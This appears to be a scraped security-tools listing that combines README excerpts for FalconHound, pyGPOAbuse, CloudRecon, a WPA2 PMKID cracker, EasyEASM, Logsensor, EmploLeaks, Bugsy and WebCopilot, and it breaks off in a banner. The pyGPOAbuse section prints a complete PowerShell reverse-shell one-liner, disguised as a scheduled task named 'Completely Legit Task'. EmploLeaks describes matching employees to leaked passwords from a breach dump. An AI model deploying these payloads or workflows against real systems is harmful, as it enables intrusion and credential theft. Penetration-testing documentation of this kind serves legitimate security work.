The action folder is divided into sub-directories per query source. All folders will be processed recursively and all YAML files will be executed in alphabetical order.

The Neo4j actions should be processed last, since their output relies on other data sources to have updated the graph database first, to get the most up-to-date results.

Action files

All files are YAML files. The YAML file contains the query, some metadata and the target(s) of the queried information.

There is a template file available in the root folder. You can use this to create your own actions. Have a look at the actions in the actions folder for more examples.

While most items will be fairly self explanatory,there are some important things to note about actions:

Enabled

As the name implies, this is used to enable or disable an action. If this is set to false, the action will not be run.

Enabled: true

Debug

This is used to enable or disable debug mode for an action. If this is set to true, the action will be run in debug mode. This will output the results of the query to the console. This is useful for testing and troubleshooting, but is not recommended to be used in production. It will slow down the processing of the action depending on the number of results.

Debug: false

Query

The Query field is the query that will be run against the source. This can be a KQL query, a SPL query or a Cypher query depending on your SourcePlatform. IMPORTANT: Try to keep the query as exact as possible and only return the fields that you need. This will make the processing of the results faster and more efficient.

Additionally, when running Cypher queries, make sure to RETURN a JSON object as the result, otherwise processing will fail. For example, this will return the Name, Count, Role and Owners of the Azure Subscriptions:

MATCH p = (n)-[r:AZOwns|AZUserAccessAdministrator]->(g:AZSubscription) 
RETURN {Name:g.name , Count:COUNT(g.name), Role:type(r), Owners:COLLECT(n.name)}

Targets

Each target has several options that can be configured. Depending on the target, some might require more configuration than others. All targets have the Name and Enabled fields. The Name field is used to identify the target. The Enabled field is used to enable or disable the target. If this is set to false, the target will be ignored.

CSV

  - Name: CSV
Enabled: true
Path: path/to/filename.csv

Neo4j

The Neo4j target will write the results of the query to a Neo4j database. This output is per line and therefore it requires some additional configuration. Since we can transfer all sorts of data in all directions, FalconHound needs to understand what to do with the data. This is done by using replacement variables in the first line of your Cypher queries. These are passed to Neo4j as parameters and can be used in the query. The ReplacementFields fields are configured below.

  - Name: Neo4j
Enabled: true
Query: |
MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound'
Parameters:
Computer: Computer
TargetUserSid: TargetUserSid
Timestamp: Timestamp

The Parameters section defines a set of parameters that will be replaced by the values from the query results. These can be referenced as Neo4j parameters using the $parameter_name syntax.

Sentinel

The Sentinel target will write the results of the query to a Sentinel table. The table will be created if it does not exist. The table will be created in the workspace that is specified in the config file. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

This is why also query output needs to be controlled, you might otherwise flood your target.

  - Name: Sentinel
Enabled: true

Sentinel Watchlists

The Sentinel Watchlists target will write the results of the query to a Sentinel watchlist. The watchlist will be created if it does not exist. The watchlist will be created in the workspace that is specified in the config file. All columns returned by the query will be added to the watchlist.

 - Name: Watchlist
Enabled: true
WatchlistName: FH_MDE_Exploitable_Machines
DisplayName: MDE Exploitable Machines
SearchKey: DeviceName
Overwrite: true

The WatchlistName field is the name of the watchlist. The DisplayName field is the display name of the watchlist.

The SearchKey field is the column that will be used as the search key.

The Overwrite field is used to determine if the watchlist should be overwritten or appended to. If this is set to false, the results of the query will be appended to the watchlist. If this is set to true, the watchlist will be deleted and recreated with the results of the query.

Splunk

Like Sentinel, Splunk will write the results of the query to a Splunk index. The index will need to be created and tied to a HEC endpoint. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

  - Name: Splunk
Enabled: true

Azure Data Explorer

Like Sentinel, Splunk will write the results of the query to a ADX table. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

  - Name: ADX
Enabled: true
Table: "name"

Extensions to the graph

Relationship: HadSession

Once a session has ended, it had to be removed from the graph, but this felt like a waste of information. So instead of removing the session,it will be added as a relationship between the computer and the user. The relationship will be called HadSession. The relationship will have the following properties:

{
"till": "2021-08-31T14:00:00Z",
"source": "falconhound",
"reason": "logoff",
}

This allows for additional path discoveries where we can investigate whether the user ever logged on to a certain system, even if the session has ended.

Properties

FalconHound will add the following properties to nodes in the graph:

Computer: - 'exploitable': true/false - 'exploits': list of CVEs - 'exposed': true/false - 'ports': list of ports accessible from the internet - 'alertids': list of alert ids

Credential management

The currently supported ways of providing FalconHound with credentials are:

  • Via the config.yml file on disk.
  • Keyvault secrets. This still requires a ServicePrincipal with secrets in the yaml.
  • Mixed mode.

Config.yml

The config file holds all details required by each platform. All items in the config file are case-sensitive. Best practise is to separate the apps on a per service level but you can use 1 AppID/AppSecret for all Azure based actions.

The required permissions for your AppID/AppSecret are listed here.

Keyvault

A more secure way of storing the credentials would be to use an Azure KeyVault. Be aware that there is a small cost aspect to using Keyvaults. Access to KeyVaults currently only supports authentication based on a AppID/AppSecret which needs to be configured in the config.yml file.

The recommended way to set this up is to use a ServicePrincipal that only has the Key Vault Secrets User role to this Keyvault. This role only allows access to the secrets, not even list them. Do NOT reuse the ServicePrincipal which has access to Sentinel and/or MDE, since this almost completely negates the use of a Keyvault.

The items to configure in the Keyvault are listed below. Please note Keyvault secrets are not case-sensitive.

SentinelAppSecret
SentinelAppID
SentinelTenantID
SentinelTargetTable
SentinelResourceGroup
SentinelSharedKey
SentinelSubscriptionID
SentinelWorkspaceID
SentinelWorkspaceName
MDETenantID
MDEAppID
MDEAppSecret
Neo4jUri
Neo4jUsername
Neo4jPassword
GraphTenantID
GraphAppID
GraphAppSecret
AdxTenantID
AdxAppID
AdxAppSecret
AdxClusterURL
AdxDatabase
SplunkUrl
SplunkApiToken
SplunkIndex
SplunkApiPort
SplunkHecToken
SplunkHecPort
BHUrl
BHTokenID
BHTokenKey
LogScaleUrl
LogScaleToken
LogScaleRepository

Once configured you can add the -keyvault parameter while starting FalconHound.

Mixed mode / fallback

When the -keyvault parameter is set on the command-line, this will be the primary source for all required secrets. Should FalconHound fail to retrieve items, it will fall back to the equivalent item in the config.yml. If both fail and there are actions enabled for that source or target, it will throw errors on attempts to authenticate.

Deployment

FalconHound is designed to be run as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date. Depending on the amount of actions you have enabled, the amount of data you are processing and the amount of data you are writing to the graph, this can take a while.

All log based queries are built to run every 15 minutes. Should processing take too long you might need to tweak this a little. If this is the case it might be recommended to disable certain actions.

Also there might be some overlap with for instance the session actions. If you have a lot of sessions you might want to disable the session actions for Sentinel and rely on the one from MDE. This is assuming you have MDE and Sentinel connected and most machines are onboarded into MDE.

Sharphound / Azurehound

While FalconHound is designed to be used with BloodHound, it is not a replacement for Sharphound and Azurehound. It is designed to compliment the collection and remove the moment-in-time problem of the peroiodic collection. Both Sharphound and Azurehound are still required to collect the data, since not all similar data is available in logs.

It is recommended to run Sharphound and Azurehound on a regular basis, for example once a day/week or month, and FalconHound every 15 minutes.

License

This project is licensed under the BSD3 License - see the LICENSE file for details.

This means you can use this software for free, even in commercial products, as long as you credit us for it. You cannot hold us liable for any damages caused by this software.



pyGPOAbuse - Partial Python Implementation Of SharpGPOAbuse

By: Zion3R


Python partial implementation of SharpGPOAbuse by@pkb1s

This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.

Default behavior adds a local administrator.


How to use

Basic usage

Add john user to local administrators group (Password: H4x00r123..)

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

Advanced usage

Reverse shell example

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
-powershell \
-command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
-taskname "Completely Legit Task" \
-description "Dis is legit, pliz no delete" \
-user

Credits



CloudRecon - Finding assets from certificates

By: Zion3R


CloudRecon

Finding assets from certificates! Scan the web! Tool presented @DEFCON 31


Install

** You must have CGO enabled, and may have to install gcc to run CloudRecon**

sudo apt install gcc
go install github.com/g0ldencybersec/CloudRecon@latest

Description

CloudRecon

CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.

Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all but many still need HTTPs.

CloudRecon is a suite of tools to scan IP addresses or CIDRs (ex: cloud providers IPs) and find these hidden gems for testers, by inspecting those SSL certificates.

The tool suite is three parts in GO:

Scrape - A LIVE running tool to inspect the ranges for a keywork in SSL certs CN and SN fields in real time.

Store - a tool to retrieve IPs certs and download all their Orgs, CNs, and SANs. So you can have your OWN cert.sh database.

Retr - a tool to parse and search through the downloaded certs for keywords.

Usage

MAIN

Usage: CloudRecon scrape|store|retr [options]

-h Show the program usage message

Subcommands:

cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout
cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file
cloudrecon retr - Query local DB file for results

SCRAPE

scrape [options] -i <IPs/CIDRs or File>
-a Add this flag if you want to see all output including failures
-c int
How many goroutines running concurrently (default 100)
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE" )
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)

STORE

store [options] -i <IPs/CIDRs or File>
-c int
How many goroutines running concurrently (default 100)
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)

RETR

retr [options]
-all
Return all the rows in the DB
-cn string
String to search for in common name column, returns like-results (default "NONE")
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-ip string
String to search for in IP column, returns like-results (default "NONE")
-num
Return the Number of rows (results) in the DB (By IP)
-org string
String to search for in Organization column, returns like-results (default "NONE")
-san string
String to search for in common name column, returns like-results (default "NONE")


Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

By: Zion3R


This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.


Program Usage

python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9

How PMKID is Calculated

The two main formulas to obtain a PMKID are as follows:

  1. Pairwise Master Key (PMK) Calculation: passphrase + salt(ssid) => PBKDF2(HMAC-SHA1) of 4096 iterations
  2. PMKID Calculation: HMAC-SHA1[pmk + ("PMK Name" + bssid + clientmac)]

This is just for understanding, both are already implemented in find_pw_chunk and calculate_pmkid.

Obtaining the PMKID

Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.

*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.

To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.

Open the pcap in WireShark:

  • Filter with wlan_rsna_eapol.keydes.msgnr == 1 in WireShark to display only EAPOL message 1 packets.
  • In EAPOL 1 pkt, Expand IEEE 802.11 QoS Data Field to obtain AP MAC, Client MAC
  • In EAPOL 1 pkt, Expand 802.1 Authentication > WPA Key Data > Tag: Vendor Specific > PMKID is below

If access point is vulnerable, you should see the PMKID value like the below screenshot:

Demo Run

Disclaimer

This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.



EasyEASM - Zero-dollar Attack Surface Management Tool

By: Zion3R


Zero-dollar attack surface management tool

featured at Black Hat Arsenal 2023 and Recon Village @ DEF CON 2023.

Description

Easy EASM is just that... the easiest to set-up tool to give your organization visibility into its external facing assets.

The industry is dominated by $30k vendors selling "Attack Surface Management," but OG bug bounty hunters and red teamers know the truth. External ASM was born out of the bug bounty scene. Most of these $30k vendors use this open-source tooling on the backend.

With ten lines of setup or less, using open-source tools, and one button deployment, Easy EASM will give your organization a complete view of your online assets. Easy EASM scans you daily and alerts you via Slack or Discord on newly found assets! Easy EASM also spits out an Excel skeleton for a Risk Register or Asset Database! This isn't rocket science, but it's USEFUL. Don't get scammed. Grab Easy EASM and feel confident you know what's facing attackers on the internet.


Installation

go install github.com/g0ldencybersec/EasyEASM/easyeasm@latest

Example config file

The tool expects a configuration file named config.yml to be in the directory you are running from.

Here is example of this yaml file:

# EasyEASM configurations
runConfig:
domains: # List root domains here.
- example.com
- mydomain.com
slack: https://hooks.slack.com/services/DUMMYDATA/DUMMYDATA/RANDOM # Slack webhook url for Slack notifications.
discord: https://discord.com/api/webhooks/DUMMYURL/Dasdfsdf # Discord webhook for Discord notifications.
runType: fast # Set to either fast (passive enum) or complete (active enumeration).
activeWordList: subdomainWordlist.txt
activeThreads: 100

Usage

To run the tool, fill out the config file: config.yml. Then, run the easyeasm module:

./easyeasm

After the run is complete, you should see the output CSV (EasyEASM.csv) in the run directory. This CSV can be added to your asset database and risk register!

Warranty

The creator(s) of this tool provides no warranty or assurance regarding its performance, dependability, or suitability for any specific purpose.

The tool is furnished on an "as is" basis without any form of warranty, whether express or implied, encompassing, but not limited to, implied warranties of merchantability, fitness for a particular purpose, or non-infringement.

The user assumes full responsibility for employing this tool and does so at their own peril. The creator(s) holds no accountability for any loss, damage, or expenses sustained by the user or any third party due to the utilization of this tool, whether in a direct or indirect manner.

Moreover, the creator(s) explicitly renounces any liability or responsibility for the accuracy, substance, or availability of information acquired through the use of this tool, as well as for any harm inflicted by viruses, malware, or other malicious components that may infiltrate the user's system as a result of employing this tool.

By utilizing this tool, the user acknowledges that they have perused and understood this warranty declaration and agree to undertake all risks linked to its utilization.

License

This project is licensed under the MIT License - see the LICENSE.md for details.

Contact

For assistance, use the Issues tab. If we do not respond within 7 days, please reach out to us here.



Logsensor - A Powerful Sensor Tool To Discover Login Panels, And POST Form SQLi Scanning

By: Zion3R


A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning

Features

  • login panel Scanning for multiple hosts
  • Proxy compatibility (http, https)
  • Login panel scanning are done in multiprocessing

so the script is super fast at scanning many urls

quick tutorial & screenshots are shown at the bottom
project contribution tips at the bottom

Β 

Installation

git clone https://github.com/Mr-Robert0/Logsensor.git
cd Logsensor && sudo chmod +x logsensor.py install.sh
pip install -r requirements.txt
./install.sh

Dependencies

Β 

Quick Tutorial

1. Multiple hosts scanning to detect login panels

  • You can increase the threads (default 30)
  • only run login detector module
python3 logsensor.py -f <subdomains-list> 
python3 logsensor.py -f <subdomains-list> -t 50
python3 logsensor.py -f <subdomains-list> --login

2. Targeted SQLi form scanning

  • can provide only specifc url of login panel with --sqli or -s flag for run only SQLi form scanning Module
  • turn on the proxy to see the requests
  • customize user input name of login panel with actual name (default "username")
python logsensor.py -u www.example.com/login --sqli 
python logsensor.py -u www.example.com/login -s --proxy http://127.0.0.1:8080
python logsensor.py -u www.example.com/login -s --inputname email

View help

Login panel Detector Module -s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls -n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email') -t , --threads Number of threads (default 30) -h, --help Show this help message and exit " dir="auto">
python logsensor.py --help

usage: logsensor.py [-h --help] [--file ] [--url ] [--proxy] [--login] [--sqli] [--threads]

optional arguments:
-u , --url Target URL (e.g. http://example.com/ )
-f , --file Select a target hosts list file (e.g. list.txt )
--proxy Proxy (e.g. http://127.0.0.1:8080)
-l, --login run only Login panel Detector Module
-s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls
-n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email')
-t , --threads Number of threads (default 30)
-h, --help Show this help message and exit

Screenshots


Development

TODO

  1. adding "POST form SQli (Time based) scanning" and check for delay
  2. Fuzzing on Url Paths So as not to miss any login panel


EmploLeaks - An OSINT Tool That Helps Detect Members Of A Company With Leaked Credentials

By: Zion3R

Β 

This is a tool designed for Open Source Intelligence (OSINT) purposes, which helps to gather information about employees of a company.

How it Works

The tool starts by searching through LinkedIn to obtain a list of employees of the company. Then, it looks for their social network profiles to find their personal email addresses. Finally, it uses those email addresses to search through a custom COMB database to retrieve leaked passwords. You an easily add yours and connect to through the tool.


Installation

To use this tool, you'll need to have Python 3.10 installed on your machine. Clone this repository to your local machine and install the required dependencies using pip in the cli folder:

cd cli
pip install -r requirements.txt

OSX

We know that there is a problem when installing the tool due to the psycopg2 binary. If you run into this problem, you can solve it running:

cd cli
python3 -m pip install psycopg2-binary`

Basic Usage

To use the tool, simply run the following command:

python3 cli/emploleaks.py

If everything went well during the installation, you will be able to start using EmploLeaks:

___________              .__         .__                 __
\_ _____/ _____ ______ | | ____ | | ____ _____ | | __ ______
| __)_ / \____ \| | / _ \| | _/ __ \__ \ | |/ / / ___/
| \ Y Y \ |_> > |_( <_> ) |_\ ___/ / __ \| < \___ \
/_______ /__|_| / __/|____/\____/|____/\___ >____ /__|_ \/____ >
\/ \/|__| \/ \/ \/ \/

OSINT tool Γ°ΕΈβ€’Β΅ to chain multiple apis
emploleaks>

Right now, the tool supports two functionalities:

  • Linkedin, for searching all employees from a company and get their personal emails.
    • A GitLab extension, which is capable of finding personal code repositories from the employees.
  • If defined and connected, when the tool is gathering employees profiles, a search to a COMB database will be made in order to retrieve leaked passwords.

Retrieving Linkedin Profiles

First, you must set the plugin to use, which in this case is linkedin. After, you should set your authentication tokens and the run the impersonate process:

emploleaks> use --plugin linkedin
emploleaks(linkedin)> setopt JSESSIONID
JSESSIONID:
[+] Updating value successfull
emploleaks(linkedin)> setopt li-at
li-at:
[+] Updating value successfull
emploleaks(linkedin)> show options
Module options:

Name Current Setting Required Description
---------- ----------------------------------- ---------- -----------------------------------
hide yes no hide the JSESSIONID field
JSESSIONID ************************** no active cookie session in browser #1
li-at AQEDAQ74B0YEUS-_AAABilIFFBsAAAGKdhG no active cookie session in browser #1
YG00AxGP34jz1bRrgAcxkXm9RPNeYIAXz3M
cycrQm5FB6lJ-Tezn8GGAsnl_GRpEANRdPI
lWTRJJGF9vbv5yZHKOeze_WCHoOpe4ylvET
kyCyfN58SNNH
emploleaks(linkedin)> run i mpersonate
[+] Using cookies from the browser
Setting for first time JSESSIONID
Setting for first time li_at

li_at and JSESSIONID are the authentication cookies of your LinkedIn session on the browser. You can use the Web Developer Tools to get it, just sign-in normally at LinkedIn and press right click and Inspect, those cookies will be in the Storage tab.

Now that the module is configured, you can run it and start gathering information from the company:

Get Linkedin accounts + Leaked Passwords

We created a custom workflow, where with the information retrieved by Linkedin, we try to match employees' personal emails to potential leaked passwords. In this case, you can connect to a database (in our case we have a custom indexed COMB database) using the connect command, as it is shown below:

emploleaks(linkedin)> connect --user myuser --passwd mypass123 --dbname mydbname --host 1.2.3.4
[+] Connecting to the Leak Database...
[*] version: PostgreSQL 12.15

Once it's connected, you can run the workflow. With all the users gathered, the tool will try to search in the database if a leaked credential is affecting someone:

As a conclusion, the tool will generate a console output with the following information:
  • A list of employees of the company (obtained from LinkedIn)
  • The social network profiles associated with each employee (obtained from email address)
  • A list of leaked passwords associated with each email address.

How to build the indexed COMB database

An imortant aspect of this project is the use of the indexed COMB database, to build your version you need to download the torrent first. Be careful, because the files and the indexed version downloaded requires, at least, 400 GB of disk space available.

Once the torrent has been completelly downloaded you will get a file folder as following:

Ò”œÒ”€Ò”€ count_total.sh
Ò”œÒ”€Ò”€ data
Γ’β€β€š Ò”œÒ”€Ò”€ 0
Γ’β€β€š Ò”œÒ”€Ò”€ 1
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 0
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 1
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 2
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 3
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 4
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò&€ 5
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 6
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 7
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 8
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ 9
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ a
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ b
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ c
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ d
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ e
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ f
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ g
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ h
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ i
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ j
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ k
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ l
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ m
Γ’β€β€š Γ’β€β€š Ò”œÒ €Ò”€ n
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ o
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ p
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ q
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ r
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ s
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ symbols
Γ’β€β€š Γ’β€β€š Ò”œÒ”€Ò”€ t

At this point, you could import all those files with the command create_db:

The importer takes a lot of time for that reason we recommend to run it with patience.

Next Steps

We are integrating other public sites and applications that may offer about a leaked credential. We may not be able to see the plaintext password, but it will give an insight if the user has any compromised credential:

  • Integration with Have I Been Pwned?
  • Integration with Firefox Monitor
  • Integration with Leak Check
  • Integration with BreachAlarm

Also, we will be focusing on gathering even more information from public sources of every employee. Do you have any idea in mind? Don't hesitate to reach us:

Or you con DM at @pastacls or @gaaabifranco on Twitter.



Bugsy - Command-line Interface Tool That Provides Automatic Security Vulnerability Remediation For Your Code

By: Zion3R


Bugsy is a command-line interface (CLI) tool that provides automatic security vulnerability remediation for your code. It is the community edition version of Mobb, the first vendor-agnostic automated security vulnerability remediation tool. Bugsy is designed to help developers quickly identify and fix security vulnerabilities in their code.


What is Mobb?

Mobb is the first vendor-agnostic automatic security vulnerability remediation tool. It ingests SAST results from Checkmarx, CodeQL (GitHub Advanced Security), OpenText Fortify, and Snyk and produces code fixes for developers to review and commit to their code.

What does Bugsy do?

Bugsy has two modes - Scan (no SAST report needed) & Analyze (the user needs to provide a pre-generated SAST report from one of the supported SAST tools).

Scan

  • Uses Checkmarx or Snyk CLI tools to run a SAST scan on a given open-source GitHub/GitLab repo
  • Analyzes the vulnerability report to identify issues that can be remediated automatically
  • Produces the code fixes and redirects the user to the fix report page on the Mobb platform

Analyze

  • Analyzes the a Checkmarx/CodeQL/Fortify/Snyk vulnerability report to identify issues that can be remediated automatically
  • Produces the code fixes and redirects the user to the fix report page on the Mobb platform

Disclaimer

This is a community edition version that only analyzes public GitHub repositories. Analyzing private repositories is allowed for a limited amount of time. Bugsy does not detect any vulnerabilities in your code, it uses findings detected by the SAST tools mentioned above.

Usage

You can simply run Bugsy from the command line, using npx:

npx mobbdev


WebCopilot - An Automation Tool That Enumerates Subdomains Then Filters Out Xss, Sqli, Open Redirect, Lfi, Ssrf And Rce Parameters And Then Scans For Vulnerabilities

By: Zion3R


WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools.

The script first enumerate all the subdomains of the given target domain using assetfinder, sublister, subfinder, amass, findomain, hackertarget, riddler and crt then do active subdomain enumeration using gobuster from SecLists wordlist then filters out all the live subdomains using dnsx then it extract titles of the subdomains using httpx & scans for subdomain takeover using subjack. Then it uses gauplus & waybackurls to crawl all the endpoints of the given subdomains then it use gf patterns to filters out xss, lfi, ssrf, sqli, open redirect & rce parameters from that given subdomains, and then it scans for vulnerabilities on the sub domains using different open-source tools (like kxss, dalfox, openredirex, nuclei, etc). Then it'll print out the result of the scan and save all the output in a specified directory.


Features

Usage

g!2m0:~ webcopilot -h
             
──────▄▀▄─────▄▀▄
β”€β”€β”€β”€β”€β–„β–ˆβ–‘β–‘β–€β–€β–€β–€β–€β–‘β–‘β–ˆβ–„
β”€β–„β–„β”€β”€β–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ”€β”€β–„β–„
β–ˆβ–„β–„β–ˆβ”€β–ˆβ–‘β–‘β–€β–‘β–‘β”¬β–‘β–‘β–€β–‘β–‘β–ˆβ”€β–ˆβ–„β–„β–ˆ
β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β•šβ•β•β–ˆβ–ˆβ•”β•β•β•
β–‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β–ˆβ–ˆβ•‘β–‘β–‘β•šβ•β•β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–‘β–ˆβ–ˆβ•”β•β•β•β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
